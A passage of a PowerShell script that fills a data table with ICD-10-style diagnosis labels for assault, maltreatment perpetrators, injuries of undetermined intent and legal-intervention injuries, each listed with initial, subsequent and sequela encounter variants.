front of (subway) train","Assault by pushing or placing victim in front of (subway) train, sequela") + $null = $DiagnosisList.Rows.Add("Assault by pushing or placing victim in front of other moving object","Assault by pushing or placing victim in front of other moving object, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by pushing or placing victim in front of other moving object","Assault by pushing or placing victim in front of other moving object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by pushing or placing victim in front of other moving object","Assault by pushing or placing victim in front of other moving object, sequela") + $null = $DiagnosisList.Rows.Add("Assault by being hit or run over by motor vehicle","Assault by being hit or run over by motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by being hit or run over by motor vehicle","Assault by being hit or run over by motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by being hit or run over by motor vehicle","Assault by being hit or run over by motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Other assault by crashing of motor vehicle","Other assault by crashing of motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Other assault by crashing of motor vehicle","Other assault by crashing of motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other assault by crashing of motor vehicle","Other assault by crashing of motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Assault by unarmed brawl or fight","Assault by unarmed brawl or fight, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by unarmed brawl or fight","Assault by unarmed brawl or fight, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by unarmed brawl or fight","Assault by unarmed brawl or fight, sequela") + $null = $DiagnosisList.Rows.Add("Assault by human bite","Assault by human bite, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by human bite","Assault by human bite, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by human bite","Assault by human bite, sequela") + $null = $DiagnosisList.Rows.Add("Assault by strike against or bumped into by another person","Assault by strike against or bumped into by another person, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by strike against or bumped into by another person","Assault by strike against or bumped into by another person, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by strike against or bumped into by another person","Assault by strike against or bumped into by another person, sequela") + $null = $DiagnosisList.Rows.Add("Assault by other bodily force","Assault by other bodily force, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by other bodily force","Assault by other bodily force, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by other bodily force","Assault by other bodily force, sequela") + $null = $DiagnosisList.Rows.Add("Spouse or partner, perpetrator of maltreatment and neglect","Husband, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Spouse or partner, perpetrator of maltreatment and neglect","Wife, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Spouse or partner, perpetrator of maltreatment and neglect","Male partner, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Spouse or partner, perpetrator of maltreatment and neglect","Female partner, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Parent (adoptive) (biological), perpetrator of maltreatment and neglect","Biological father, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Parent (adoptive) (biological), perpetrator of maltreatment and neglect","Biological mother, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Parent (adoptive) (biological), perpetrator of maltreatment and neglect","Adoptive father, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Parent (adoptive) (biological), perpetrator of maltreatment and neglect","Adoptive mother, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Sibling, perpetrator of maltreatment and neglect","Brother, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Sibling, perpetrator of maltreatment and neglect","Sister, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Foster parent, perpetrator of maltreatment and neglect","Foster father, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Foster parent, perpetrator of maltreatment and neglect","Foster mother, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Stepparent or stepsibling, perpetrator of maltreatment and neglect","Stepfather, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Stepparent or stepsibling, perpetrator of maltreatment and neglect","Male friend of parent (co-residing in household), perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Stepparent or stepsibling, perpetrator of maltreatment and neglect","Stepmother, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Stepparent or stepsibling, perpetrator of maltreatment and neglect","Female friend of parent (co-residing in household), perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Stepparent or stepsibling, perpetrator of maltreatment and neglect","Stepbrother, perpetrator or maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Stepparent or stepsibling, perpetrator of maltreatment and neglect","Stepsister, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Other family member, perpetrator of maltreatment and neglect","Male cousin, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Other family member, perpetrator of maltreatment and neglect","Female cousin, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Other family member, perpetrator of maltreatment and neglect","Other family member, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Non-family member, perpetrator of maltreatment and neglect","Unspecified non-family member, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Daycare provider, perpetrator of maltreatment and neglect","At-home childcare provider, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Daycare provider, perpetrator of maltreatment and neglect","Daycare center childcare provider, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Daycare provider, perpetrator of maltreatment and neglect","At-home adultcare provider, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Daycare provider, perpetrator of maltreatment and neglect","Adultcare center provider, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Daycare provider, perpetrator of maltreatment and neglect","Unspecified daycare provider, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Healthcare provider, perpetrator of maltreatment and neglect","Mental health provider, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Healthcare provider, perpetrator of maltreatment and neglect","Other therapist or healthcare provider, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Healthcare provider, perpetrator of maltreatment and neglect","Unspecified healthcare provider, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Teacher or instructor, perpetrator of maltreatment and neglect","Teacher or instructor, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Other non-family member, perpetrator of maltreatment and neglect","Other non-family member, perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Unspecified perpetrator of maltreatment and neglect","Unspecified perpetrator of maltreatment and neglect") + $null = $DiagnosisList.Rows.Add("Assault by strike by hockey stick","Assault by strike by hockey stick, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by strike by hockey stick","Assault by strike by hockey stick, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by strike by hockey stick","Assault by strike by hockey stick, sequela") + $null = $DiagnosisList.Rows.Add("Assault by strike by baseball bat","Assault by strike by baseball bat, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by strike by baseball bat","Assault by strike by baseball bat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by strike by baseball bat","Assault by strike by baseball bat, sequela") + $null = $DiagnosisList.Rows.Add("Assault by strike by other specified type of sport equipment","Assault by strike by other specified type of sport equipment, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by strike by other specified type of sport equipment","Assault by strike by other specified type of sport equipment, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by strike by other specified type of sport equipment","Assault by strike by other specified type of sport equipment, sequela") + $null = $DiagnosisList.Rows.Add("Assault by crashing of aircraft","Assault by crashing of aircraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by crashing of aircraft","Assault by crashing of aircraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by crashing of aircraft","Assault by crashing of aircraft, sequela") + $null = $DiagnosisList.Rows.Add("Assault by other specified means","Assault by other specified means, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by other specified means","Assault by other specified means, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by other specified means","Assault by other specified means, sequela") + $null = $DiagnosisList.Rows.Add("Assault by unspecified means","Assault by unspecified means") + $null = $DiagnosisList.Rows.Add("Drowning and submersion while in bathtub, undetermined intent","Drowning and submersion while in bathtub, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion while in bathtub, undetermined intent","Drowning and submersion while in bathtub, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion while in bathtub, undetermined intent","Drowning and submersion while in bathtub, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion after fall into bathtub, undetermined intent","Drowning and submersion after fall into bathtub, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion after fall into bathtub, undetermined intent","Drowning and submersion after fall into bathtub, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion after fall into bathtub, undetermined intent","Drowning and submersion after fall into bathtub, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion while in swimming pool, undetermined intent","Drowning and submersion while in swimming pool, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion while in swimming pool, undetermined intent","Drowning and submersion while in swimming pool, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion while in swimming pool, undetermined intent","Drowning and submersion while in swimming pool, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion after fall into swimming pool, undetermined intent","Drowning and submersion after fall into swimming pool, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion after fall into swimming pool, undetermined intent","Drowning and submersion after fall into swimming pool, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion after fall into swimming pool, undetermined intent","Drowning and submersion after fall into swimming pool, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion in natural water, undetermined intent","Drowning and submersion in natural water, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion in natural water, undetermined intent","Drowning and submersion in natural water, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion in natural water, undetermined intent","Drowning and submersion in natural water, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Other drowning and submersion, undetermined intent","Other drowning and submersion, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Other drowning and submersion, undetermined intent","Other drowning and submersion, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other drowning and submersion, undetermined intent","Other drowning and submersion, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified drowning and submersion, undetermined intent","Unspecified drowning and submersion, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified drowning and submersion, undetermined intent","Unspecified drowning and submersion, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified drowning and submersion, undetermined intent","Unspecified drowning and submersion, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Handgun discharge, undetermined intent","Handgun discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Handgun discharge, undetermined intent","Handgun discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Handgun discharge, undetermined intent","Handgun discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Shotgun discharge, undetermined intent","Shotgun discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Shotgun discharge, undetermined intent","Shotgun discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Shotgun discharge, undetermined intent","Shotgun discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Hunting rifle discharge, undetermined intent","Hunting rifle discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Hunting rifle discharge, undetermined intent","Hunting rifle discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hunting rifle discharge, undetermined intent","Hunting rifle discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Military firearm discharge, undetermined intent","Military firearm discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Military firearm discharge, undetermined intent","Military firearm discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military firearm discharge, undetermined intent","Military firearm discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Machine gun discharge, undetermined intent","Machine gun discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Machine gun discharge, undetermined intent","Machine gun discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Machine gun discharge, undetermined intent","Machine gun discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Other larger firearm discharge, undetermined intent","Other larger firearm discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Other larger firearm discharge, undetermined intent","Other larger firearm discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other larger firearm discharge, undetermined intent","Other larger firearm discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified larger firearm discharge, undetermined intent","Unspecified larger firearm discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified larger firearm discharge, undetermined intent","Unspecified larger firearm discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified larger firearm discharge, undetermined intent","Unspecified larger firearm discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Airgun discharge, undetermined intent","Airgun discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Airgun discharge, undetermined intent","Airgun discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Airgun discharge, undetermined intent","Airgun discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Other firearm discharge, undetermined intent","Other firearm discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Other firearm discharge, undetermined intent","Other firearm discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other firearm discharge, undetermined intent","Other firearm discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified firearm discharge, undetermined intent","Unspecified firearm discharge, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified firearm discharge, undetermined intent","Unspecified firearm discharge, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified firearm discharge, undetermined intent","Unspecified firearm discharge, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with explosive material, undetermined intent","Contact with explosive material, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with explosive material, undetermined intent","Contact with explosive material, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with explosive material, undetermined intent","Contact with explosive material, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to smoke, fire and flames, undetermined intent","Exposure to smoke, fire and flames, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke, fire and flames, undetermined intent","Exposure to smoke, fire and flames, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to smoke, fire and flames, undetermined intent","Exposure to smoke, fire and flames, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with steam and hot vapors, undetermined intent","Contact with steam and hot vapors, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with steam and hot vapors, undetermined intent","Contact with steam and hot vapors, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with steam and hot vapors, undetermined intent","Contact with steam and hot vapors, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot tap water, undetermined intent","Contact with hot tap water, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot tap water, undetermined intent","Contact with hot tap water, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot tap water, undetermined intent","Contact with hot tap water, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot fluids, undetermined intent","Contact with hot fluids, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot fluids, undetermined intent","Contact with hot fluids, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot fluids, undetermined intent","Contact with hot fluids, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with hot household appliance, undetermined intent","Contact with hot household appliance, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot household appliance, undetermined intent","Contact with hot household appliance, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with hot household appliance, undetermined intent","Contact with hot household appliance, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other hot objects, undetermined intent","Contact with other hot objects, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot objects, undetermined intent","Contact with other hot objects, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other hot objects, undetermined intent","Contact with other hot objects, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with unspecified hot objects, undetermined intent","Contact with unspecified hot objects, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified hot objects, undetermined intent","Contact with unspecified hot objects, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified hot objects, undetermined intent","Contact with unspecified hot objects, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with sharp glass, undetermined intent","Contact with sharp glass, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with sharp glass, undetermined intent","Contact with sharp glass, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with sharp glass, undetermined intent","Contact with sharp glass, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with knife, undetermined intent","Contact with knife, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with knife, undetermined intent","Contact with knife, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with knife, undetermined intent","Contact with knife, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with sword or dagger, undetermined intent","Contact with sword or dagger, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with sword or dagger, undetermined intent","Contact with sword or dagger, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with sword or dagger, undetermined intent","Contact with sword or dagger, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with other sharp object, undetermined intent","Contact with other sharp object, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with other sharp object, undetermined intent","Contact with other sharp object, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with other sharp object, undetermined intent","Contact with other sharp object, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with unspecified sharp object, undetermined intent","Contact with unspecified sharp object, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified sharp object, undetermined intent","Contact with unspecified sharp object, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with unspecified sharp object, undetermined intent","Contact with unspecified sharp object, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Contact with blunt object, undetermined intent","Contact with blunt object, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Contact with blunt object, undetermined intent","Contact with blunt object, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contact with blunt object, undetermined intent","Contact with blunt object, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Falling, jumping or pushed from a high place, undetermined intent","Falling, jumping or pushed from a high place, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Falling, jumping or pushed from a high place, undetermined intent","Falling, jumping or pushed from a high place, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Falling, jumping or pushed from a high place, undetermined intent","Falling, jumping or pushed from a high place, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Falling, lying or running before or into moving object, undetermined intent","Falling, lying or running before or into moving object, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Falling, lying or running before or into moving object, undetermined intent","Falling, lying or running before or into moving object, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Falling, lying or running before or into moving object, undetermined intent","Falling, lying or running before or into moving object, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Crashing of motor vehicle, undetermined intent","Crashing of motor vehicle, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Crashing of motor vehicle, undetermined intent","Crashing of motor vehicle, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crashing of motor vehicle, undetermined intent","Crashing of motor vehicle, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Other specified events, undetermined intent","Other specified events, undetermined intent, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified events, undetermined intent","Other specified events, undetermined intent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified events, undetermined intent","Other specified events, undetermined intent, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified firearm discharge, law enforcement official injured","Legal intervention involving unspecified firearm discharge, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified firearm discharge, law enforcement official injured","Legal intervention involving unspecified firearm discharge, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified firearm discharge, law enforcement official injured","Legal intervention involving unspecified firearm discharge, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified firearm discharge, bystander injured","Legal intervention involving unspecified firearm discharge, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified firearm discharge, bystander injured","Legal intervention involving unspecified firearm discharge, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified firearm discharge, bystander injured","Legal intervention involving unspecified firearm discharge, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified firearm discharge, suspect injured","Legal intervention involving unspecified firearm discharge, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified firearm discharge, suspect injured","Legal intervention involving unspecified firearm discharge, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified firearm discharge, suspect injured","Legal intervention involving unspecified firearm discharge, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by machine gun, law enforcement official injured","Legal intervention involving injury by machine gun, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by machine gun, law enforcement official injured","Legal intervention involving injury by machine gun, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by machine gun, law enforcement official injured","Legal intervention involving injury by machine gun, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by machine gun, bystander injured","Legal intervention involving injury by machine gun, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by machine gun, bystander injured","Legal intervention involving injury by machine gun, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by machine gun, bystander injured","Legal intervention involving injury by machine gun, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by machine gun, suspect injured","Legal intervention involving injury by machine gun, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by machine gun, suspect injured","Legal intervention involving injury by machine gun, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by machine gun, suspect injured","Legal intervention involving injury by machine gun, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by handgun, law enforcement official injured","Legal intervention involving injury by handgun, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by handgun, law enforcement official injured","Legal intervention involving injury by handgun, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by handgun, law enforcement official injured","Legal intervention involving injury by handgun, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by handgun, bystander injured","Legal intervention involving injury by handgun, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by handgun, bystander injured","Legal intervention involving injury by handgun, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by handgun, bystander injured","Legal intervention involving injury by handgun, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by handgun, suspect injured","Legal intervention involving injury by handgun, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by handgun, suspect injured","Legal intervention involving injury by handgun, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by handgun, suspect injured","Legal intervention involving injury by handgun, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rifle pellet, law enforcement official injured","Legal intervention involving injury by rifle pellet, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rifle pellet, law enforcement official injured","Legal intervention involving injury by rifle pellet, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rifle pellet, law enforcement official injured","Legal intervention involving injury by rifle pellet, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rifle pellet, bystander injured","Legal intervention involving injury by rifle pellet, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rifle pellet, bystander injured","Legal intervention involving injury by rifle pellet, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rifle pellet, bystander injured","Legal intervention involving injury by rifle pellet, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rifle pellet, suspect injured","Legal intervention involving injury by rifle pellet, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rifle pellet, suspect injured","Legal intervention involving injury by rifle pellet, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rifle pellet, suspect injured","Legal intervention involving injury by rifle pellet, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rubber bullet, law enforcement official injured","Legal intervention involving injury by rubber bullet, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rubber bullet, law enforcement official injured","Legal intervention involving injury by rubber bullet, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rubber bullet, law enforcement official injured","Legal intervention involving injury by rubber bullet, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rubber bullet, bystander injured","Legal intervention involving injury by rubber bullet, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rubber bullet, bystander injured","Legal intervention involving injury by rubber bullet, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rubber bullet, bystander injured","Legal intervention involving injury by rubber bullet, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rubber bullet, suspect injured","Legal intervention involving injury by rubber bullet, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rubber bullet, suspect injured","Legal intervention involving injury by rubber bullet, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving injury by rubber bullet, suspect injured","Legal intervention involving injury by rubber bullet, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other firearm discharge, law enforcement official injured","Legal intervention involving other firearm discharge, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other firearm discharge, law enforcement official injured","Legal intervention involving other firearm discharge, law enforcement official injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other firearm discharge, law enforcement official injured","Legal intervention involving other firearm discharge, law enforcement official injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other firearm discharge, bystander injured","Legal intervention involving other firearm discharge, bystander injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other firearm discharge, bystander injured","Legal intervention involving other firearm discharge, bystander injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other firearm discharge, bystander injured","Legal intervention involving other firearm discharge, bystander injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other firearm discharge, suspect injured","Legal intervention involving other firearm discharge, suspect injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other firearm discharge, suspect injured","Legal intervention involving other firearm discharge, suspect injured, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving other firearm discharge, suspect injured","Legal intervention involving other firearm discharge, suspect injured, sequela") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified explosives, law enforcement official injured","Legal intervention involving unspecified explosives, law enforcement official injured, initial encounter") + $null = $DiagnosisList.Rows.Add("Legal intervention involving unspecified explosives, law enforcement official injured","Legal 